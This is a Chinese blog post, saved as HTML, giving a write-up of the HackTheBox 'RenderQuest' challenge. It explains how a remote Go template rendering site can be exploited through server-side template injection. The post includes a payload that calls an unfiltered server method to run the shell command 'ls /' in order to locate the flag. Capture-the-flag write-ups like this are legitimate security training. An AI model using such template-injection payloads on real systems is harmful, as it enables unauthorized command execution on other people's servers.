<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="懒"><meta name="theme-color" content="#2d4356"><meta name="baidu-site-verification"><title>HackTheBox RenderQuest WriteUP | 忘返</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.png"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script><meta name="generator" content="Hexo 6.3.0"></head><link rel="stylesheet" type="text/css" href="/plugins/highlight/atom-one-dark.min.css"><script type="text/javascript" src="/plugins/highlight/highlight.min.js"></script><script>hljs.initHighlightingOnLoad();
</script><script type="text/javascript" src="/js/ready.js" async></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"><body class="night"><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/">LITREILY</a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/profile.jpg" width="128" height="128"></a><h1 class="ttl"><a href="/">忘返</a></h1></div><p class="m-desc">正经人谁写日记啊。</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/tags/">标签</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><li><span class="dot">●</span><a href="/links/">友链</a></li><li><span class="dot">●</span><a href="/Tips/">Tips</a></li><li class="m-sch"><form class="form" id="j-formsch" method="get"><input class="txt" type="text" id="local-search-input" name="q" value="搜索" onfocus="if(this.value=='搜索'){this.value='';}" onblur="if(this.value==''){this.value='搜索';}"><input type="text" style="display:none;"></form></li></ul><div id="local-search-result"></div></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">HackTheBox RenderQuest WriteUP</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2023/09/25/HackTheBox-RenderQuest-WriteUP/">2023-09-25</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><blockquote>
<p>You’ve found a website that lets you input remote templates for rendering. Your task is to exploit this system’s vulnerabilities to access and retrieve a hidden flag. Good luck!</p>
</blockquote>
<p>翻译：您发现了一个可以输入远程模板进行渲染的网站。您的任务是利用该系统的漏洞访问和检索一个隐藏标志。祝你好运！</p>
<p><img src="/2023/09/25/HackTheBox-RenderQuest-WriteUP/image.png" alt="challenge"></p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>根据描述，网站的功能是让我们提供一个远程的模板，网站对我们的模板进行渲染。远程站点我们可以用GitHubPages，可是我不会写Golang的模板，结题失败，此贴结束。</p>
<p>咳咳。</p>
<p>我不会写，让ChatGPT写一个不就完了。先写一个普通的看看长什么样：</p>
<pre><code class="HTML">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;Client &amp; Server Info&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;h2&gt;Client Information&lt;/h2&gt;
    &lt;ul&gt;
        &lt;li&gt;Client IP: &#123;&#123;.ClientIP&#125;&#125;&lt;/li&gt;
        &lt;li&gt;User Agent: &#123;&#123;.ClientUA&#125;&#125;&lt;/li&gt;
        &#123;&#123;with .ClientIpInfo&#125;&#125;
            &lt;li&gt;IP Version: &#123;&#123;.IpVersion&#125;&#125;&lt;/li&gt;
            &lt;li&gt;IP Address: &#123;&#123;.IpAddress&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Latitude: &#123;&#123;.Latitude&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Longitude: &#123;&#123;.Longitude&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Country Name: &#123;&#123;.CountryName&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Country Code: &#123;&#123;.CountryCode&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Time Zone: &#123;&#123;.TimeZone&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Zip Code: &#123;&#123;.ZipCode&#125;&#125;&lt;/li&gt;
            &lt;li&gt;City Name: &#123;&#123;.CityName&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Region Name: &#123;&#123;.RegionName&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Continent: &#123;&#123;.Continent&#125;&#125;&lt;/li&gt;
            &lt;li&gt;Continent Code: &#123;&#123;.ContinentCode&#125;&#125;&lt;/li&gt;
        &#123;&#123;end&#125;&#125;
    &lt;/ul&gt;
    &lt;h2&gt;Server Information&lt;/h2&gt;
    &lt;ul&gt;
        &lt;li&gt;Hostname: &#123;&#123;.ServerInfo.Hostname&#125;&#125;&lt;/li&gt;
        &lt;li&gt;Operating System: &#123;&#123;.ServerInfo.OS&#125;&#125;&lt;/li&gt;
        &lt;li&gt;Kernel Version: &#123;&#123;.ServerInfo.KernelVersion&#125;&#125;&lt;/li&gt;
        &lt;li&gt;Memory: &#123;&#123;.ServerInfo.Memory&#125;&#125;&lt;/li&gt;
    &lt;/ul&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>丢给网站看看效果：</p>
<p><img src="/2023/09/25/HackTheBox-RenderQuest-WriteUP/image-1.png" alt="template"></p>
<p>很好，模板生效了。看到这种题目，第一时间想到的，就是模板注入。检查源码我们可以看到源码中刚好定义了可以执行系统命令的方法：</p>
<p><img src="/2023/09/25/HackTheBox-RenderQuest-WriteUP/image-2.png" alt="exec"></p>
<p>并且这个方法没有对传入的参数做任何过滤。那么，后面的事情就简单了。</p>
<h2 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h2><p>构造Payload查看flag文件的文件名：</p>
<pre><code class="HTML">    &lt;h2&gt;Get Flag&lt;/h2&gt;
    &lt;ul&gt;
        &lt;li&gt;Flag: &#123;&#123;.FetchServerInfo "ls /"&#125;&#125;&lt;/li&gt;
    &lt;/ul&gt;
</code></pre>
<p><img src="/2023/09/25/HackTheBox-RenderQuest-WriteUP/image-3.png" alt="flag-file"></p>
<p>读取Flag(这一步Payload就不用多说了吧)：</p>
<p><img src="/2023/09/25/HackTheBox-RenderQuest-WriteUP/image-4.png" alt="flag"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>感谢ChatGPT</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ul>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12642">Go语言下的模板注入</a></li>
</ul>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="mailto:litreily@163.com">忘返</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2023/09/25/HackTheBox-RenderQuest-WriteUP/">https://7mitu.github.io/2023/09/25/HackTheBox-RenderQuest-WriteUP/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="https://7mitu.github.io">忘返的博客</a>！</span></div></blockquote></div></article><div class="p-info box"><span class="p-tags"><i class="fa fa-tags"></i><a href="/tags/HackTheBox/">HackTheBox</a><a href="/tags/Web/">Web</a><a href="/tags/Golang%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/">Golang模板注入</a></span></div><aside id="toc"><div class="toc-title">目录</div><nav><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">2.</span> <span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">3.</span> <span class="toc-text">解题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0"><span class="toc-number">4.</span> <span class="toc-text">后记</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">5.</span> <span class="toc-text">参考资料</span></a></li></ol></nav></aside></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="next" href="/2023/09/12/HackTheBox-Obscure-WriteUP/">HackTheBox Obscure WriteUP &gt;</a></div></section><footer><p>Copyright © 2016 - 2023 <a href="/." rel="nofollow">忘返</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
    search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script></body></html>